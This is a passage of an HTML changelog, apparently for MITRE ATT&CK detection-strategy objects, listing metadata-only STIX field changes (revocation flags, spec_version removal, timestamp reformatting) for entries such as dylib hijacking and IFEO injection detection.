collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0004] Detection Strategy for Hijack Execution Flow using Path Interception by PATH Environment Variable.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0564] Detection Strategy for Hijack Execution Flow using Path Interception by Search Order Hijacking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0479] Detection Strategy for Hijack Execution Flow using the Windows COR_PROFILER.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0152] Detection Strategy for Hijack Execution Flow: Dylib Hijacking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0435] Detection Strategy for Hijack Execution Flow: Dynamic Linker Hijacking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0422] Detection Strategy for IFEO Injection on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0067] Detection Strategy for Ignore Process Interrupts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0286] Detection Strategy for Impersonation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0189] Detection Strategy for Indicator Removal from Tools - Post-AV Evasion Modification</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0568] Detection Strategy for Input Injection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0920] Detection Strategy for Invisible Unicode</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T18:44:43.178Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:44:43.178000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:23:25.386Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.391000+00:00</td></tr></tbody></table></details><hr><h4>[DET0322] Detection Strategy for Junk Code Obfuscation with Suspicious Execution Patterns</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0450] Detection Strategy for Kernel Modules and Extensions Autostart Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0216] Detection Strategy for LC_LOAD_DYLIB Modification in Mach-O Binaries on macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0405] Detection Strategy for LNK Icon Smuggling</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0183] Detection Strategy for Lateral Tool Transfer across OS platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid 